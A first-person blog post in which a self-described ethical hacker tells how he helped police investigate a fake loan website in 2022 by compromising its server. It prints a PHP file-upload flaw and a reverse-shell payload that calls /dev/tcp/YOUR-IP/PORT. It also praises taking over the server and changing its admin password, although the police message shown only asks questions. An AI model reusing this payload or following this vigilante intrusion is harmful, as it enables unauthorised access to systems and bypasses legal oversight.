Real Case:
Do You Know How I Helped Cybercrime Police Solve a Fake Loan App and Uncover the Accused's IP? 🤔
I'm here to share an interesting investigation story that occurred on December 13, 2022. You may or may not be aware, but I specialize in investigating cybercrime cases.
I firmly believe that utilizing my cyber security skills can contribute to cracking down on cybercrime. This particular case allowed me to showcase my expertise.
Initial Contact from Police
On December 13, I received a case through WhatsApp from the Chennai Cyber Cell. They wanted information about a suspicious website that was collecting money from people.
They had a few doubts:
- What type of data was the website collecting?
- Could we gather information ourselves?
First Steps - OSINT & Web Analysis
Given my proficiency in web hacking and security testing, with proper permission, I decided to conduct OSINT (Open Source Intelligence) to find valid information about the target.
However, it didn't yield fruitful results 😐. So, I took a bold step and decided to take over the target server. After several attempts, I successfully gained admin access and changed the password. To my astonishment, the website had collected personal data from over 4000+ users.
Discovery: The Fake Loan Network
After conducting thorough analysis, I confirmed that it was a fake loan app run by individuals from China. A total of 27,019 users had been approved for fake loans. I meticulously recorded everything, collecting evidence and creating a comprehensive case report.
The report included details such as the server IP, server owner IP, information of approved loan users, and a proof-of-concept video demonstrating the server compromise.
Screenshots
From Cybercrime Police Tamil Nadu“Hi sir, www211.xxxx.xyz This is fake website which impersonated as Yubi and misrepresenting to the public that they can provide loan facility and collecting money from public ss security deposit. Doubts: 1. What type of data to be collect for this fake website. 2. Who will give the data or to whom address the request. 3. Can we collect any information by ourselves by using any tools or OSINT. Pl reply sir”
Send by Me Karthithehacker“hello sir i successfully hacked this website and take control of it yes its fake website run by chines peoples and this web site already collected 4000+ users info i attached my hacked poc( proof of concept) video do check it out”
Technical Exploitation: File Upload Vulnerability
During the hacking of the web application, I identified a file upload vulnerability in the profile picture update feature. This functionality lacked proper file validation and allowed me to upload arbitrary files.
Here’s a simplified version of the vulnerable PHP code:
<?php
$target_dir = "profiles/";
$target_file = $target_dir . basename($_FILES["profile_pic"]["name"]);
move_uploaded_file($_FILES["profile_pic"]["tmp_name"], $target_file);
?>
This code accepts any file type and saves it to the server without checking the file extension or MIME type. I crafted a reverse shell payload in PHP and uploaded it:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR-IP/PORT 0>&1'");
?>
Once the shell was uploaded, I triggered the file to establish a reverse shell connection from my VPS. After gaining access, I compressed and downloaded the source code of the web application. While analyzing it, I discovered hardcoded admin credentials.
In this situation, the source code alone wouldn’t be helpful for law enforcement, so I used the credentials to log into the admin panel, documented all findings, and immediately changed the credentials to prevent misuse.
Final Thoughts
All of this work was accomplished within a span of 12 hours. I consider it my responsibility as an Indian to provide my services and utilize my skills to assist government law enforcement agencies. 🇮🇳🔒
For detailed information, please check the attached screenshots.
Note: Not all the time will I be successful in penetrating and gaining admin access to servers. Sometimes, I may fail to gain access. However, I always promise myself to do my best.
Remember, stay safe from cyber attacks! If you need assistance with cyber-related problems, you can reach out by calling 1930 (National Cyber Crime HelpLine).
Conclusion
I believe I used my skills to protect people in this digital era. Stay safe, stay alert—and never trust unfamiliar links without verifying them first.
